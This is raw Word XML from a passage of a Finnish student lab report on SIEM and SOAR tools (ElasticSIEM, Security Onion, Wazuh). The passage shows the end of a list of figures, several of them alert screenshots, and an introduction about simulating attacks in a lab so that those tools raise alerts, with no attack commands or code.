          <w:instrText xml:space="preserve"> PAGEREF _Toc183971548 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="2CF8BC7F" w14:textId="518282D2">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49">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 32. Etäkäytön analyysi</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971549 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="5D64189F" w14:textId="22A453E1">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0">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 33. Inveighin käyttö</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971550 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="64116659" w14:textId="60F1947A">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1">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 34. Komento</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971551 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="0A905554" w14:textId="4BBE5023">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2">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 35. Analyysi ohjelman suorittamisesta</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971552 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="5E2627B1" w14:textId="1DE4DF8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3">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 36. Alert_elastic_Atomic123</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971553 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="78CDA9A2" w14:textId="4CE47C28">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4">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Kuvio 37. Wazuh_alert_Atomic123</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971554 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="04F1A11E" w14:textId="399088FF">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5">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 38. Elastic_analyzer</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971555 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="44BEB9B7" w14:textId="0E327DC8">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6">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 39. SecOnion_alert1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971556 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="63E775B3" w14:textId="1C5DF67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7">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 40. network.data</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971557 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="419B3429" w14:textId="4A735666">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikkoluettelo"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:lang w:eastAsia="fi-FI"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc183971558">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 41. vertailuTaulukko</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971558 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008531E2" w:rsidP="00CA77C5" w:rsidRDefault="00CA77C5" w14:paraId="7F44B891" w14:textId="383EA122">
      <w:pPr>
        <w:pStyle w:val="Sisllysluettelootsikko"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0074339C" w:rsidR="00D54DFF">
        <w:t>Taulukot</w:t>
      </w:r>
      <w:r w:rsidR="005643B0">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005643B0">
        <w:instrText xml:space="preserve"> TOC \h \z \t "Taulukko" \c </w:instrText>
      </w:r>
      <w:r w:rsidR="005643B0">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0074339C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0074339C">
        <w:instrText xml:space="preserve"> TOC \h \z \c "Taulukko" </w:instrText>
      </w:r>
      <w:r w:rsidR="0074339C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008531E2" w:rsidP="00B75F2C" w:rsidRDefault="008531E2" w14:paraId="0A69A131" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikkoluettelo"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc432081817" r:id="rId13">
        <w:r w:rsidRPr="00E61AEE">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Taulukko 1. </w:t>
        </w:r>
        <w:r w:rsidRPr="00B75F2C" w:rsidR="009D55B7">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Taulukon</w:t>
        </w:r>
        <w:r w:rsidR="009D55B7">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="004666C1">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>otsikko, ei lähdetietoja</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc432081817 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005713A7">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>Virhe. Kirjanmerkkiä ei ole määritetty.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidRPr="008C22D4" w:rsidR="008C22D4" w:rsidP="00CA77C5" w:rsidRDefault="008531E2" w14:paraId="11599ADD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikkoluettelo"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1" w:anchor="_Toc432081818" r:id="rId14">
        <w:r w:rsidRPr="00E61AEE">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Taulukko 2. </w:t>
        </w:r>
        <w:r w:rsidR="009D55B7">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">Taulukon </w:t>
        </w:r>
        <w:r w:rsidR="004666C1">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>otsikko, ei lähdetietoja</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc432081818 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005713A7">
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>Virhe. Kirjanmerkkiä ei ole määritetty.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D27C61" w:rsidRDefault="00D27C61" w14:paraId="3596BD65" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00C01873" w:rsidR="003E0724" w:rsidP="00E868F1" w:rsidRDefault="0074339C" w14:paraId="72EC8C80" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:name="_Toc428542252" w:id="0"/>
      <w:bookmarkStart w:name="_Toc428799791" w:id="1"/>
      <w:bookmarkStart w:name="_Toc430675189" w:id="2"/>
      <w:bookmarkStart w:name="_Toc430767989" w:id="3"/>
      <w:bookmarkStart w:name="_Toc527546201" w:id="4"/>
      <w:bookmarkStart w:name="_Toc17205362" w:id="5"/>
      <w:bookmarkStart w:name="_Toc52971244" w:id="6"/>
      <w:bookmarkStart w:name="_Toc52971603" w:id="7"/>
      <w:bookmarkStart w:name="_Toc58338869" w:id="8"/>
      <w:bookmarkStart w:name="_Toc63413616" w:id="9"/>
      <w:r w:rsidR="0071788B">
        <w:rPr/>
        <w:t>Johdanto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00895D07" w:rsidP="004B30A1" w:rsidRDefault="00A52845" w14:paraId="475DF82B" w14:textId="1187AA02">
      <w:bookmarkStart w:name="_Toc428542253" w:id="11"/>
      <w:bookmarkStart w:name="_Toc428799792" w:id="12"/>
      <w:bookmarkStart w:name="_Toc430675190" w:id="13"/>
      <w:bookmarkStart w:name="_Toc430767990" w:id="14"/>
      <w:bookmarkStart w:name="_Toc527546202" w:id="15"/>
      <w:bookmarkStart w:name="_Toc17205363" w:id="16"/>
      <w:r w:rsidR="00A52845">
        <w:rPr/>
        <w:t xml:space="preserve">Tässä harjoitustyössä </w:t>
      </w:r>
      <w:r w:rsidR="008A33F2">
        <w:rPr/>
        <w:t>perehdymme SIEM ja SOAR työkalujen merkitykseen ympäristössä ja niiden käyttö</w:t>
      </w:r>
      <w:r w:rsidR="0064179D">
        <w:rPr/>
        <w:t>ön</w:t>
      </w:r>
      <w:r w:rsidR="008A33F2">
        <w:rPr/>
        <w:t>. Aiheutamme hälytyksiä järjestelmiin simuloimalla hyökkäys tapahtumia</w:t>
      </w:r>
      <w:r w:rsidR="004223D4">
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008A33F2">
        <w:rPr/>
        <w:t xml:space="preserve"> joiden pitäisi laukaista hälytys </w:t>
      </w:r>
      <w:r w:rsidR="006943B6">
        <w:rPr/>
        <w:t>järjestelmissä.</w:t>
      </w:r>
      <w:r w:rsidR="4CBAD62B">
        <w:rPr/>
        <w:t xml:space="preserve"> Simulointia ennen, on</w:t>
      </w:r>
      <w:r w:rsidR="41CF9633">
        <w:rPr/>
        <w:t xml:space="preserve"> aina</w:t>
      </w:r>
      <w:r w:rsidR="4CBAD62B">
        <w:rPr/>
        <w:t xml:space="preserve"> lyhyt kappale siitä, mitä </w:t>
      </w:r>
      <w:r w:rsidR="7E182E19">
        <w:rPr/>
        <w:t>hälytyksiä</w:t>
      </w:r>
      <w:r w:rsidR="4CBAD62B">
        <w:rPr/>
        <w:t xml:space="preserve"> voidaan odottaa hyökkäyksestä</w:t>
      </w:r>
      <w:r w:rsidR="38C8C4C9">
        <w:rPr/>
        <w:t>, ja miten työkalut ne voi havaita.</w:t>
      </w:r>
      <w:r w:rsidR="006943B6">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004223D4">
        <w:rPr/>
        <w:t>Perehdymme myös SOAR ja SIEM järjestelmien eroihin ja niiden ominaisuuksiin</w:t>
      </w:r>
      <w:r w:rsidR="00D00637">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004223D4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00895D07">
        <w:rPr/>
        <w:t>Käytössä olevat järjestelmät:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A67A4F" w:rsidP="00895D07" w:rsidRDefault="00895D07" w14:paraId="77D70F45" w14:textId="74DC162A">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ElasticSIEM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895D07" w:rsidP="00895D07" w:rsidRDefault="00895D07" w14:paraId="72E6E149" w14:textId="6891727E">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Security Onion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895D07" w:rsidP="00895D07" w:rsidRDefault="00895D07" w14:paraId="3A0DED0E" w14:textId="530C854D">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895D07" w:rsidP="00895D07" w:rsidRDefault="00895D07" w14:paraId="43B333B6" w14:textId="77777777"/>
    <w:p w:rsidR="00895D07" w:rsidP="00895D07" w:rsidRDefault="00AB58D5" w14:paraId="3BB4E906" w14:textId="6ADEAC14">
      <w:r>
        <w:t xml:space="preserve">Testit suoritetaan VLE </w:t>
      </w:r>
      <w:r w:rsidR="00745999">
        <w:t>ympäristöön,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> joka on kuvattu kuviossa 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00745999" w:rsidP="00745999" w:rsidRDefault="00745999" w14:paraId="50982ECC" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00745999">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E4917B4" wp14:editId="451F1128">
            <wp:extent cx="4753638" cy="2972215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39424432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4321" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4753638" cy="2972215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB58D5" w:rsidP="00745999" w:rsidRDefault="00745999" w14:paraId="431B19F4" w14:textId="6508B3AA">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971518" w:id="17"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. VLE</w:t>
